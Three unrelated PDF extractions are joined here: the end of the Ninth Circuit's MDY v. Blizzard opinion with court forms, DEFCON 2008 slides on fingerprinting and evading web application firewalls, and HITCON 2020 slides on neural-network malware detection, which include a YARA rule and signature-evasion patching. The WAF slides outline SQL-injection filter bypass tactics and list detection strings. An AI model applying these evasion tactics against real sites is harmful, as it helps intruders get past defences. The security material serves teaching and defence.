explained that ToU § 4(B)’s bot prohibition is a license cove-
nant rather than a condition. Thus, a Glider user who violates
this covenant does not infringe by continuing to copy code
into RAM. Accordingly, MDY does not violate § 1201(b)(1)
by enabling Glider users to avoid Warden’s interruption of
their authorized copying into RAM.
[22] Second, although WoW players can theoretically
record game play by taking screen shots, there is no evidence
that Warden detects or prevents such allegedly infringing copy-
ing.
19 This is logical, because Warden was designed to reduce
the presence of cheats and bots, not to protect WoW’s
dynamic non-literal elements against copying. We conclude
that Warden does not effectively protect any of Blizzard’s
rights under the Copyright Act, and MDY is not liable under
§ 1201(b)(1) for Glider’s circumvention of Warden.
20
19No evidence establishes that Glider users engage in this practice, and
Glider itself does not provide a software mechanism for taking screenshots
or otherwise reproducing copyrighted WoW material.
20The district court permanently enjoined “MDY and Michael Donnelly
from engaging in contributory or vicarious copyright infringement and
from violating the DMCA with respect to Blizzard’s copyrights in and
rights to” WoW. Because we conclude that MDY is not liable under
§ 1201(b)(1), we vacate the aspect of the permanent injunction dealing
with MDY’s and Donnelly’s § 1201(b)(1) liability.
20022
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 41 of 47 ID: 7579806 DktEntry: 54-1
VI.
The district court granted Blizzard summary judgment on
its claim against MDY for tortious interference with contract
(“tortious interference”) under Arizona law and held that
Donnelly was personally liable for MDY’s tortious interfer-
ence. We review the district court’s grant of summary judg-
ment de novo. See Canyon Ferry Rd. Baptist Church of East
Helena, Inc. v. Unsworth, 556 F.3d 1021, 1027 (9th Cir.
2009). We view the evidence in the light most favorable to
non-movant MDY in determining whether there are any genu-
ine issues of material fact. Id. Because we conclude that there
are triable issues of material fact, we vacate and remand for
trial.
A. Elements of Blizzard’s tortious interference claim
To recover for tortious interference under Arizona law,
Blizzard must prove: (1) the existence of a valid contractual
relationship; (2) MDY’s knowledge of the relationship; (3)
MDY’s intentional interference in inducing or causing the
breach; (4) the impropriety of MDY’s interference; and (5)
resulting damages. See Safeway Ins. Co. v. Guerrero, 106
P.3d 102, 1025 (Ariz. 2005); see also Antwerp Diamond
Exch. of Am., Inc. v. Better Bus. Bur. of Maricopa County,
Inc., 637 P.2d 733, 740 (Ariz. 1981).
Blizzard satisfies four of these five elements based on
undisputed facts. First, a valid contractual relationship exists
between Blizzard and its customers based on the operative
EULA and ToU. Second, MDY was aware of this relation-
ship: it does not contend that it was unaware of the operative
EULA and ToU, or unaware that using Glider breached their
terms. In fact, after Blizzard first attempted to ban Glider
users, MDY modified its website to notify customers that
using Glider violated the ToU. Third, MDY intentionally
interfered with Blizzard’s contracts. After Blizzard used War-
den to ban a majority of Glider users in September 2005,
20023
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 42 of 47 ID: 7579806 DktEntry: 54-1
MDY programmed Glider to be undetectable by Warden.
Finally, Blizzard has proffered evidence that it was damaged
by MDY’s conduct.
Thus, Blizzard is entitled to summary judgment if there are
no triable issues of material fact as to the fourth element of
its tortious interference claim: whether MDY’s actions were
improper. To determine whether a defendant’s conduct was
improper, Arizona employs the seven-factor test of Restate-
ment (Second) of Torts § 767. See Safeway, 106 P.3d at 1027;
see also Wagonseller v. Scottsdale Mem’l Hosp., 710 P.2d
1025, 1042-43 (Ariz. 1985), superseded in other respects by
A.R.S. § 23-1501. The seven factors are (1) the nature of
MDY’s conduct, (2) MDY’s motive, (3) Blizzard’s interests
with which MDY interfered, (4) the interests MDY sought to
advance, (5) the social interests in protecting MDY’s freedom
of action and Blizzard’s contractual interests, (6) the proxim-
ity or remoteness of MDY’s conduct to the interference, and
(7) the relations between MDY and Blizzard. Id. A court
should give greatest weight to the first two factors. Id. We
conclude that summary judgment was inappropriate here,
because on the current record, taking the facts in the light
most favorable to MDY, the first five factors do not clearly
weigh in either side’s favor, thus creating a genuine issue of
material fact.
1. Nature of MDY’s conduct and MDY’s motive
The parties have presented conflicting evidence with
respect to these two most important factors. Blizzard’s evi-
dence tends to demonstrate that MDY helped Glider users
gain an advantage over other WoW players by advancing
automatically to a higher level of the game. Thus, MDY
knowingly assisted Glider users to breach their contracts, and
then helped to conceal those breaches from Blizzard. Bliz-
zard’s evidence also supports the conclusion that Blizzard was
negatively affected by MDY’s Glider sales, because Glider
use: (1) distorts WoW’s virtual economy by flooding it with
20024
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 43 of 47 ID: 7579806 DktEntry: 54-1
excess resources; (2) interferes with WoW players’ ability to
interact with other human players in the virtual world; and (3)
strains Blizzard’s servers because bots spend more continuous
time in-game than do human players. Finally, Blizzard intro-
duced evidence that MDY’s motive was its three and a half
to four million dollar profit.
On the other hand, MDY proffered evidence that it created
Glider in 2005, when Blizzard’s ToU did not explicitly pro-
hibit bots.
21 Glider initially had no anti-detection features.
MDY added these features only after Blizzard added Warden
to WoW. Blizzard did not change the EULA or ToU to pro-
scribe bots such as Glider explicitly until after MDY began
selling Glider. Finally, MDY has introduced evidence that
Glider enhances some players’ experience of the game,
including players who might otherwise not play WoW at all.
Taking this evidence in the light most favorable to MDY,
there is a genuine issue of material fact as to these factors.
2. Blizzard’s interests with which MDY interferes; the
interest that MDY seeks to advance; the social interest
in protecting MDY’s and Blizzard’s respective interests
Blizzard argues that it seeks to provide its millions of WoW
players with a particular role-playing game experience that
excludes bots. It contends, as the district court determined,
that MDY’s interest depends on inducing Blizzard’s custom-
ers to breach their contracts. In contrast, MDY argues that
Glider is an innovative, profitable software program that has
positively affected its users’ lives by advancing them to
WoW’s more interesting levels. MDY has introduced evi-
21When MDY created Glider in 2005, Blizzard’s ToU prohibited the use
of “cheats” and “unauthorized third-party software” in connection with
WoW. The meaning of these contractual terms, including whether they
prohibit bots such as Glider, is ambiguous. In Arizona, the construction of
ambiguous contract provisions is a jury question. See Clark v. Compania
Ganadera de Cananea, S.A., 385 P.2d 691, 697-98 (Ariz. 1963).
20025
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 44 of 47 ID: 7579806 DktEntry: 54-1
dence that Glider allows players with limited motor skills to
continue to play WoW, improves some users’ romantic rela-
tionships by reducing the time that they spend playing WoW,
and allows users who work long hours to play WoW. We fur-
ther note that, if the fact-finder decides that Blizzard did not
ban bots at the time that MDY created Glider, the fact-finder
might conclude that MDY had a legitimate interest in continu-
ing to sell Glider. Again, the parties’ differing evidence
creates a genuine issue of material fact that precludes an
award of summary judgment.
3. Proximity of MDY’s conduct to the interference;
relationship between MDY and Blizzard
[23] MDY’s Glider sales are the but-for cause of Glider
users’ breach of the operative ToU. Moreover, Blizzard and
MDY are not competitors in the online role-playing game
market; rather, MDY’s profits appear to depend on the contin-
ued popularity of WoW. Blizzard, however, chose not to
authorize MDY to sell Glider to its users. Even accepting that
these factors favor Blizzard, we do not think that they inde-
pendently warrant a grant of summary judgment to Blizzard.
As noted, we cannot hold that five of the seven “impropriety”
factors compel a finding in Blizzard’s favor at this stage,
including the two (nature of MDY’s conduct and MDY’s
motive) that the Arizona courts deem most important.
Accordingly, we vacate the district court’s grant of summary
judgment to Blizzard.
22
B. Copyright Act preemption
MDY contends that Blizzard’s tortious interference claim
is preempted by the Copyright Act. The Copyright Act pre-
empts state laws that confer rights equivalent to the exclusive
22Because the district court entered a permanent injunction based on
MDY’s liability for tortious interference, we also vacate that permanent
injunction.
20026
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 45 of 47 ID: 7579806 DktEntry: 54-1
rights of copyright under 17 U.S.C. § 106 (i.e., reproduction,
distribution, public display, public performance, and creation
of derivative works). 17 U.S.C. § 301(a). However, the Copy-
right Act does not preempt state law remedies with respect to
“activities violating legal or equitable rights that are not
equivalent to any of the exclusive rights [of copyright].” 17
U.S.C. § 301(b)(3).
[24] Whether, in these circumstances, tortious interference
with contract is preempted by the Copyright Act is a question
of first impression in this circuit. However, we have previ-
ously addressed a similar tortious interference cause of action
under California law and found it not preempted. See Altera
Corp. v. Clear Logic, Inc., 424 F.3d 1079, 1089-90 (9th Cir.
2005). In so holding, we relied on the Seventh Circuit’s analy-
sis in ProCD, 86 F.3d 1447, which explained that because
contractual rights are not equivalent to the exclusive rights of
copyright, the Copyright Act’s preemption clause usually
does not affect private contracts. Altera, 424 F.3d at 1089; see
ProCD, 86 F.3d at 1454 (“A copyright is a right against the
world. Contracts, by contrast, generally affect only their par-
ties; strangers may do as they please, so contracts do not
create ‘exclusive rights.’ ”). The Fourth, Fifth, and Eighth
Circuits have also held that the Copyright Act does not pre-
empt a party’s enforcement of its contractual rights. See Nat’l
Car Rental Sys., Inc. v. Comp. Assoc. Int’l, Inc., 991 F.2d 426,
433 (8th Cir. 1993); Taquino v. Teledyne Monarch Rubber,
893 F.2d 1488, 1501 (5th Cir. 1990); Acorn Structures, Inc.
v. Swantz, 846 F.2d 923, 926 (4th Cir. 1988).
[25] This action concerns the anti-bot provisions of ToU
§ 4(b)(ii) and (iii), which we have held are contract-
enforceable covenants rather than copyright-enforceable con-
ditions. We conclude that since Blizzard seeks to enforce con-
tractual rights that are not equivalent to any of its exclusive
rights of copyright, the Copyright Act does not preempt its
tortious interference claim. Cf. Altera, 424 F0.3d at 1089-90.
Accordingly, we hold that Blizzard’s tortious interference
20027
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 46 of 47 ID: 7579806 DktEntry: 54-1
claim under Arizona law is not preempted by the Copyright
Act, but we vacate the grant of summary judgment because
there are outstanding issues of material fact.
23
VII.
The district court found that Donnelly was personally liable
for MDY’s tortious interference with contract, secondary
copyright infringement, and DMCA violations. We vacate the
district court’s decision because we determine that MDY is
not liable for secondary copyright infringement and is liable
under the DMCA only for violation of § 1201(a)(2) with
respect to WoW’s dynamic non-literal elements. In addition,
we conclude that summary judgment is inappropriate as to
Blizzard’s claim for tortious interference with contract under
Arizona law. Accordingly, on remand, the district court shall
reconsider the issue of Donnelly’s personal liability.
24 The
district court’s decision is VACATED and the case is
REMANDED to the district court for further proceedings
consistent with this opinion.
Each side shall bear its own costs.
23Because we determine that there are triable issues of fact, we need not,
and do not, address MDY’s further contentions: that (1) Blizzard has
unclean hands because it changed the ToU to ban bots after this litigation
began; and (2) MDY is not liable for tortious interference because it only
“honestly persuaded” people to buy Glider.
24If MDY is found liable at trial for tortious interference with contract,
the district court may consider Donnelly’s personal liability for that tor-
tious interference. Moreover, the district court may determine whether
Donnelly is personally liable for MDY’s violation of DMCA § 1201(a)(2).
In light of the foregoing disposition regarding Donnelly’s personal liabil-
ity, we also vacate in toto the district court’s permanent injunction against
Donnelly, though the district court may consider the propriety of an
injunction against Donnelly if it finds him liable for MDY’s § 1201(a)(2)
violations or for tortious interference with contract.
20028
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 47 of 47 ID: 7579806 DktEntry: 54-1
United States Court of Appeals for the Ninth Circuit
Office of the Clerk
95 Seventh Street
San Francisco, CA 94103
Information Regarding Judgment and Post-Judgment Proceedings
(December 2009)
Judgment
•
This Court has filed and entered the attached judgment in your case.
Fed. R. App. P. 36. Please note the filed date on the attached
decision because all of the dates described below run from that date,
not from the date you receive this notice.
Mandate (Fed. R. App. P. 41; 9th Cir. R. 41-1 & -2)
•
The mandate will issue 7 days after the expiration of the time for
filing a petition for rehearing or 7 days from the denial of a petition
for rehearing, unless the Court directs otherwise. To file a motion to
stay the mandate, file it electronically via the appellate ECF system
or, if you are a pro se litigant or an attorney with an exemption from
using appellate ECF, file one original motion on paper.
Petition for Panel Rehearing (Fed. R. App. P. 40; 9th Cir. R. 40-1)
Petition for Rehearing En Banc (Fed. R. App. P. 35; 9th Cir. R. 35-1 to -3)
(1)
A.
Purpose (Panel Rehearing):
•
A party should seek panel rehearing only if one or more of the following
grounds exist:
►
A material point of fact or law was overlooked in the decision;
►
A change in the law occurred after the case was submitted which
appears to have been overlooked by the panel; or
►
An apparent conflict with another decision of the Court was not
addressed in the opinion.
•
Do not file a petition for panel rehearing merely to reargue the case.
B.
Purpose (Rehearing En Banc)
•
A party should seek en banc rehearing only if one or more of the following
grounds exist:
Post Judgment Form - Rev. 12/2009
1
Case: 09-16044 12/14/2010 Page: 1 of 5 ID: 7579806 DktEntry: 54-2
►
Consideration by the full Court is necessary to secure or maintain
uniformity of the Court’s decisions; or
►
The proceeding involves a question of exceptional importance; or
►
The opinion directly conflicts with an existing opinion by another
court of appeals or the Supreme Court and substantially affects a
rule of national application in which there is an overriding need for
national uniformity.
(2)
Deadlines for Filing:
•
A petition for rehearing may be filed within 14 days after entry of
judgment. Fed. R. App. P. 40(a)(1).
•
If the United States or an agency or officer thereof is a party in a civil case,
the time for filing a petition for rehearing is 45 days after entry of
judgment. Fed. R. App. P. 40(a)(1).
•
If the mandate has issued, the petition for rehearing should be
accompanied by a motion to recall the mandate.
•
See Advisory Note to 9th Cir. R. 40-1 (petitions must be received on the
due date).
•
An order to publish a previously unpublished memorandum disposition
extends the time to file a petition for rehearing to 14 days after the date of
the order of publication or, in all civil cases in which the United States or
an agency or officer thereof is a party, 45 days after the date of the order of
publication. 9th Cir. R. 40-2.
(3)
Statement of Counsel
•
A petition should contain an introduction stating that, in counsel’s
judgment, one or more of the situations described in the “purpose” section
above exist. The points to be raised must be stated clearly.
(4)
Form & Number of Copies (9th Cir. R. 40-1; Fed. R. App. P. 32(c)(2))
•
The petition shall not exceed 15 pages unless it complies with the
alternative length limitations of 4,200 words or 390 lines of text.
•
The petition must be accompanied by a copy of the panel’s decision being
challenged.
•
An answer, when ordered by the Court, shall comply with the same length
limitations as the petition.
•
If a pro se litigant elects to file a form brief pursuant to Circuit Rule 28-1, a
petition for panel rehearing or for rehearing en banc need not comply with
Fed. R. App. P. 32.
Post Judgment Form - Rev. 12/2009
2
Case: 09-16044 12/14/2010 Page: 2 of 5 ID: 7579806 DktEntry: 54-2
•
The petition or answer must be accompanied by a Certificate of
Compliance found at Form 11, available on our website at under Forms.
•
You may file a petition electronically via the appellate ECF system. No
paper copies are required unless the Court orders otherwise. If you are a
pro se litigant or an attorney exempted from using the appellate ECF
system, file one original petition on paper. No additional paper copies are
required unless the Court orders otherwise.
Bill of Costs (Fed. R. App. P. 39, 9th Cir. R. 39-1)
•
The Bill of Costs must be filed within 14 days after entry of judgment.
•
See Form 10 for additional information, available on our website at under
Forms.
Attorneys Fees
•
Ninth Circuit Rule 39-1 describes the content and due dates for attorneys
fees applications.
•
All relevant forms are available on our website at under Forms or by
telephoning (415) 355-7806.
Petition for a Writ of Certiorari
•
Please refer to the Rules of the United States Supreme Court at
Counsel Listing in Published Opinions
•
Please check counsel listing on the attached decision.
•
If there are any errors in a published opinion, please send a letter in
writing within 10 days to:
►
West Publishing Company; 610 Opperman Drive; PO Box 64526;
St. Paul, MN 55164-0526 (Attn: Kathy Blesener, Senior Editor);
►
and electronically file a copy of the letter via the appellate ECF
system by using “File Correspondence to Court,” or if you are an
attorney exempted from using the appellate ECF system, mail the
Court one copy of the letter.
Post Judgment Form - Rev. 12/2009
3
Case: 09-16044 12/14/2010 Page: 3 of 5 ID: 7579806 DktEntry: 54-2
Form 10. Bill of Costs ................................................................................................................................(Rev. 12-1-09)
United States Court of Appeals for the Ninth Circuit
BILL OF COSTS
Note:
If you wish to file a bill of costs, it MUST be submitted on this form and filed, with the clerk, with proof of
service, within 14 days of the date of entry of judgment, and in accordance with 9th Circuit Rule 39-1. A
late bill of costs must be accompanied by a motion showing good cause. Please refer to FRAP 39, 28
U.S.C. § 1920, and 9th Circuit Rule 39-1 when preparing your bill of costs.
v.
9th Cir. No.
The Clerk is requested to tax the following costs against:
Cost Taxable
under FRAP 39,
28 U.S.C. § 1920,
9th Cir. R. 39-1
REQUESTED
Each Column Must Be Completed
ALLOWED
To Be Completed by the Clerk
No. of
Docs.
Pages per
Doc.
Cost per
Page*
TOTAL
COST
TOTAL
COST
Pages per
Doc.
No. of
Docs.
Excerpt of Record
Opening Brief
Reply Brief
$
$
$
$
$
$
$
$
Other**
Answering Brief
$
$
$
$
$
$
$
$
$
$
$
$
$
$
TOTAL:
TOTAL:
* Costs per page may not exceed .10 or actual cost, whichever is less. 9th Circuit Rule 39-1.
Cost per
Page*
Any other requests must be accompanied by a statement explaining why the item(s) should be taxed
pursuant to 9th Circuit Rule 39-1. Additional items without such supporting statements will not be
considered.
Attorneys' fees cannot be requested on this form.
** Other:
Continue to next page.
Case: 09-16044 12/14/2010 Page: 4 of 5 ID: 7579806 DktEntry: 54-2
Form 10. Bill of Costs - Continued
I,
, swear under penalty of perjury that the services for which costs are taxed
were actually and necessarily performed, and that the requested costs were actually expended as listed.
Signature
Date
Name of Counsel:
Attorney for:
Date
Costs are taxed in the amount of $
Clerk of Court
By:
, Deputy Clerk
(To Be Completed by the Clerk)
("s/" plus attorney's name if submitted electronically)
Case: 09-16044 12/14/2010 Page: 5 of 5 ID: 7579806 DktEntry: 54-2 | pdf |
Playing with Web Application Firewalls
DEFCON 16, August 8-10, 2008, Las Vegas, NV, USA
http://ws.hackaholic.org
Playing with Web Application Firewalls
Who is Wendel Guglielmetti Henrique ?
● Penetration Test analyst at SecurityLabs - Intruders Tiger Team Security division
(http://www.intruders.com.br) - One of the leading companies in the segment in Brazil,
among our clients are government, credit card industry, etc.
● Affiliated to Hackaholic team (http://hackaholic.org/).
● Has been working in IT since 1997, during the last 7 years he has worked in the
computer security field.
● Discovered vulnerabilities in many software programs like Webmails, Access Points,
Citrix Metaframe, etc.
● Wrote tools used as examples in articles in national magazines like PCWorld Brazil
and international ones like Hakin9 Magazine.
● Speaker at famous Brazilian conferences such as H2HC, Code Breakers and invited
as speaker to IT Underground 2006 - Italy and IT1TK1 2007 - Mexico.
http://ws.hackaholic.org
Playing with Web Application Firewalls
AGENDA:
● What is WAF?
● Types of operation modes.
● Common topology.
● Passive or Reactive?
● Tricks to detect WAF systems.
● Tricks to fingerprint WAF systems.
● Generic evasion techniques.
● Specific techniques to evade WAF systems.
● What does it fail to protect ?
http://ws.hackaholic.org
Playing with Web Application Firewalls
What is WAF?
Web Application Firewall (WAF): An intermediary device, sitting between a web-client
and a web server, analyzing OSI Layer-7 messages for violations in the programmed
security policy. A web application firewall is used as a security device protecting the
web server from attack.
Source: Web Application Security Consortium Glossary.
http://www.webappsec.org/projects/glossary/#WebApplicationFirewall
http://ws.hackaholic.org
Playing with Web Application Firewalls
What is WAF?
● Web Application Firewalls are often called 'Deep Packet Inspection Firewalls'
because
they
look
at
every
request
and
response
within
the
HTTP/HTTPS/SOAP/XML-RPC/Web Service layers.
● Some Web Application Firewalls look for certain 'attack signatures' to try to identify a
specific attack that an intruder may be sending, while others look for abnormal
behavior that doesn't fit the websites normal traffic patterns.
● Web Application Firewalls can be either software, or hardware appliance based and
are installed in front of a webserver in an effort to try and shield it from incoming
attacks.
http://ws.hackaholic.org
Playing with Web Application Firewalls
What is WAF?
Some notes about definitions:
● Some modern WAF systems work both with attack signatures and abnormal
behavior.
● WAF systems do not necessarily need to be installed in front of a webserver, some
products allow installation directly into the Webserver machine.
● WAF systems do not necessarily detect only incoming attacks, nowadays many
products detect inbound and outbound attacks.
http://ws.hackaholic.org
Playing with Web Application Firewalls
Types of operation modes:
Negative model (blacklist based).
Positive model (whitelist based).
Mixed model (mix negative and positive model protection).
http://ws.hackaholic.org
Playing with Web Application Firewalls
Types of operation modes:
A negative security model recognize attacks by relying on a database of expected
attack signatures.
Example:
Do not allow in any page, any argument value (user input) which match potential XSS
strings like <script>, </script>, String.fromCharCode, etc.
Pros:
● Less time to implement (plug and play or plug and hack? :).
Cons:
● More false positives.
● More processing time.
● Less protection.
http://ws.hackaholic.org
Playing with Web Application Firewalls
Types of operation modes:
A positive security model enforces positive behavior by learning the application logic
and then building a security policy of valid known requests as a user interacts with the
application.
Example:
Page news.jsp, the field id could only accept characters [0-9] and starting at number 0
until 65535.
Pros:
● Better performance (less rules).
● Less false positives.
Cons:
● Much more time to implement.
● Some vendors provide “automatic learning mode”, they help, but are far from perfect,
in the end, you always need a skilled human to review the policies.
http://ws.hackaholic.org
Playing with Web Application Firewalls
Types of operation modes:
A mixed mode uses both a negative and a positive model, in general one of them is
predominant.
http://ws.hackaholic.org
Playing with Web Application Firewalls
Common topology:
In general WAF systems can be used with 3 different network topologies:
● Between the webserver and the webclient (the most common).
● Integrated into the webserver (used in small environments).
● Connected in a switch via port mirror, also referred as Switched Port Analyzer
(SPAN) or Roving Analysis Port (RAP). (Better performance).
http://ws.hackaholic.org
Playing with Web Application Firewalls
Passive or Reactive?
● Most WAF systems work both: passive and reactive mode
● In general, passive mode is used during the first days, to prevent real users being
blocked by false positives.
● In production environments most WAF systems runs in reactive mode.
http://ws.hackaholic.org
Playing with Web Application Firewalls
Tricks to detect WAF systems:
WAF systems leave several signs which permit us to detect them, like:
● Cookies – Some WAF products add their own cookie in the HTTP communication.
Example – Citrix Netscaler:
GET /news.asp?PageId=254 HTTP/1.1
Host: www.SomeSite.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.12)
Accept: image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://www.SomeSite.com
Cookie:ASPSESSIONCWKSPSVLTF=OUESYHFAPQLFMNBTKJHGQGXM;
ns_af=xL9sPs2RIJMF5GhtbxSnol+xU0uSx;
ns_af_.SomeSite.com_%2F_wat=KXMhOJ7DvSHNDkBAHDwMSNsFHMSFHEmSr?nmEkaen19mlrw
Bio1/lsrzV810C&
http://ws.hackaholic.org
Playing with Web Application Firewalls
Tricks to detect WAF systems:
● Header Rewrite – Some WAF products allow the rewriting of HTTP headers. The
most common field is Server, this is used to try to deceive the attackers.
Interesting behavior:
This different behavior allows us to detect the presence of WAF systems.
Some WAF vendors:
- Only rewrite the header in hostile requests.
- Depending on the hostile request, it removes the Server field in the HTTP response.
- If the request is valid and non hostile it keeps the original webserver response.
http://ws.hackaholic.org
Playing with Web Application Firewalls
Tricks to detect WAF systems:
Example – HTTP response – Valid and non hostile request:
HTTP/1.1 200 OK
Date: Fri, 27 Jun 2008 23:14:50 GMT
Server: Apache/2.2.9 (Unix)
X-Powered-By: PHP/4.4.7
Content-Type: text/html
Content-Length: 71746
Example – HTTP response – hostile request:
HTTP/1.1 404 Not Found
Date: Fri, 27 Jun 2008 23:20:26 GMT
Server: Netscape-Enterprise/4.0
Content-Length: 213
Content-Type: text/html; charset=iso-8859-1
http://ws.hackaholic.org
Playing with Web Application Firewalls
Tricks to detect WAF systems:
● Some WAF vendors return different HTTP response error codes in the same URL
(valid one) if you insert a hostile parameter (even if the URL points to a file that doesn't
exist).
Example – HTTP response – Valid URL and hostile parameter:
HTTP/1.1 501 Method Not Implemented
Date: Fri, 27 Jun 2008 23:30:54 GMT
Allow: TRACE
Content-Length: 279
Connection: close
Content-Type: text/html; charset=iso-8859-1
http://ws.hackaholic.org
Playing with Web Application Firewalls
Tricks to detect WAF systems:
● Some WAF vendors provide a feature to “close connection” with the attacker when a
hostile packet is found.
From mod_security documentation:
DROP Action: “Immediately initiate a "connection close" action to tear down the TCP
connection by sending a FIN packet.”
Attackers requesting hostile pages or parameters can detect mod_security.
NOTE.: This feature is not available in old versions of mod_security.
http://ws.hackaholic.org
Playing with Web Application Firewalls
Tricks to detect WAF systems:
NOTE: Some of this techniques can be used to detect IPS (Intrusion Prevention
Systems) too.
http://ws.hackaholic.org
Playing with Web Application Firewalls
Tricks to fingerprint WAF systems:
All (at least all that I know) WAF systems have a built-in group of rules in negative
mode, these rules are different in each products, this rules can be:
● A specific rule for a specific well known vulnerability (for example: IIS Unicode
attack).
● A generic rule for a specific well known class of vulnerability (for example: SQL
Injections).
These rules are associated with an action (for example: DROP the request, Redirect to
another Page, etc).
http://ws.hackaholic.org
Playing with Web Application Firewalls
Tricks to fingerprint WAF systems:
Attackers can create a set of attacks that test for a range of vulnerabilities that most
WAF systems protect against or not. In this way we are able to identify built-in rules of
a product and consequently what product it is.
Example – Set of attacks to WAF “A”:
● Request using HTTP method different from 1.0 and 1.1 (detected and action taken).
● Request with Content-Length where the method is different than POST (not
detected).
● URI with recursive path – even invalid path (detected and action taken).
● Request where Cookie name matches “cmd="” (detected and action taken).
● Request where URI matches “/usr/X11R6/bin/xterm” (not detected).
http://ws.hackaholic.org
Playing with Web Application Firewalls
Tricks to fingerprint WAF systems:
The attacker can go deeper, and create several mutations for the same attack with
different evasion methods, allowing them to have more precise identification of WAF
systems and the version running.
Some techniques presented in “Tricks to detect WAF systems” slides can also be
useful to help in fingerprint a WAF system.
These techniques can be used to create a big database allowing us to detect most
WAF systems and IPS on the market.
http://ws.hackaholic.org
Playing with Web Application Firewalls
Generic evasion techniques:
Today we have a wide range of techniques to evade IPS and some WAF systems,
most of these attacks works because:
● Bad normalization and canonicalization implementations in the WAF system.
● Weak rules in the WAF system.
● Evasion at network and transport layer in some cases affect IPS and some WAF
systems (depending on topology and product).
http://ws.hackaholic.org
Playing with Web Application Firewalls
Generic evasion techniques:
Common Examples:
● SQL comments in parameters to try to defeat some SQL Injection rules.
● Words in random case to try to defeat some SQL Injection rules.
● SQL query encoding (for example: hex encoding via database features).
● URI encoding (for example: Unicode forward slash).
● IP packet fragmentation.
http://ws.hackaholic.org
Playing with Web Application Firewalls
Specific techniques to evade WAF systems:
Similarly as attackers can fingerprint WAF systems, as presented, they can use a
technique to precisely identify which restrictions of a rule applies to a specific class of
vulnerabilities.
Example – SQL Injection rule:
● An attacker can insert a hostile SQL Injection to a parameter and expect to be
detected and an action taken.
● Using trial and error, is possible to identify specific combinations of strings and
characters which are allowed or denied.
● This procedure can be repeated many times to identify for example which character
combinations are allowed and when used in conjunction with other allowed
combinations, the resulting combination becomes a denied one.
http://ws.hackaholic.org
Playing with Web Application Firewalls
Specific techniques to evade WAF systems:
Once we are able to identify which is black-listed and white-listed, in many cases we
are able to reconstruct our SQL query (or other attack) to match the requirements as a
non hostile request.
Example – Real life:
In a recent penetration test, we were able to bypass a Citrix Netscaler using this
technique.
Basically what we did after identifying the rules was rebuild the query like:
● Removing all “NULL” words.
● Use query encoding in some parts.
● Remove the single quote character “'”.
● And have fun! :)
http://ws.hackaholic.org
Playing with Web Application Firewalls
What does it fail to protect ?
Some classes of attacks are really difficult to prevent, even for WAF systems, like:
● XSS – Cross Site Scripting is extremely mutable and consequently very hard to
effectively protect against.
● File Uploads: - Some WAF systems do a good job in protecting against hostile file
uploads, but when dealing against webshell uploads (like php shell, asp shell, jsp
shell, etc) they tend to fail when using advanced evasion techniques.
● Remote Command Execution based in Server Response: Is extremely hard to
effectively detect remote command execution attacks based in Server Responses (like
a rule to identify signs of a “uname -na” or “id” command), because if the attacker is
somehow able to interact with a shell, he can use so many evasion methods to encode
the output in hex-code, character replacement, etc.
http://ws.hackaholic.org
Playing with Web Application Firewalls
NOTE: Hackaholic - We have a private forum and we are looking for skilled members.
Questions ?
wendel (at) security.org.br
http://ws.hackaholic.org | pdf |
2020
4141414141414141414
AAAAAAAAAAA
HITCON
[email protected]
Reversing In Wonderland
Neural Network Based Malware Detection Techniques
• Master degree at CSIE, NTUST
• Security Researcher - chrO.ot
• Speaker - BlackHat, DEFCON, HITCON, CYBERSEC
• [email protected]
• 30cm.tw & Hao's Arsenal
#Windows #Reversing #Pwn #Exploit
• Associate Professor of CSIE, NTUST
• Joint Associate Research Fellow of
CITI, Academia Sinica
• [email protected]
#4G #5G #LTE_Attack #IoT
[email protected]
1. Malware in the Wild
2. Semantics
3. Semantic-Aware: PV-DM
4. Asm2Vec & Experiment
5. Challenge
/?outline
[email protected]
〉〉〉Malware In the Wild
[email protected]
#behavior
[email protected]
#behavior
[email protected]
#behavior
[email protected]
#
rule silent_banker : banker {
meta:
description = "malware in the wild"
threat_level = 3
in_the_wild = true
strings:
$a = {6A 40 68 00 30 00 00 6A 14 8D 91}
$b = {8D 4D B0 2B C1 83 C0 27 59 F7 F9}
$c = "UVODFRYSIHLNWPEJXQZAKCBGMT"
condition:
$a or $b or $c
}
YARA
[email protected]
File Headr Opt Header
PE Data
$a
$c
+a0 +1e8
+9f7c
malware.exe [detected]
$b
/?malware
[email protected]
File Headr Opt Header
PE Data
$a
$b
$c
+a0 +1e8
+9f7c
malware.exe [detected]
File Headr Opt Header
PE Data (patched)
malware_test#1.bin
#1
\x00\x00..
\x00\x00..
detect😡
/?malware
[email protected]
/?malware
File Headr Opt Header
PE Data
$a
$b
$c
+a0 +1e8
+9f7c
malware.exe [detected]
File Headr Opt Header
PE Data (patched)
malware_test#2.bin
#2
\x00\x00..
\x00\x00..
clear👍
[email protected]
File Headr Opt Header
PE Data
$a
$b
$c
+a0 +1e8
+9f7c
malware.exe [detected]
File Headr Opt Header
PE Data (patched)
malware_test#3.bin
#3
\x00\x00..
\x00\x00..
detect😡
/?malware
[email protected]
#免殺
[email protected]
#免殺
[email protected]
#AMSI
[email protected]
• Active Protection System
- rule-based, not strong enough against unkown attacks
• Malware Pattern based on Reversing
- lack of lexical semantic of assembly → false positive
- too slow against variability malware
• Known Challenges
- compiler optimization
- Mirai, Hakai, Yowai, SpeakUp
- Anti-AntiVirus Techniques
• Word Embedding Techniques (NLP)
- use only few samples to predict income binary files
- learn lexical semantic from instruction sequences
/?challenge
[email protected]
〉〉〉Semantics
“You shall know a word by the company it keeps“
(Firth, J. R. 1957:11)
/?semantics
[email protected]
/?semantics
“... I can show you the world. Shining,
shimmering, splendid. Tell me, princess,
now when did. You last let your heart
decide? I can open your eyes, Take you
wonder by wonder ...”
[email protected]
/?semantics
” I drink beer. and the other people“
[email protected]
/?semantics
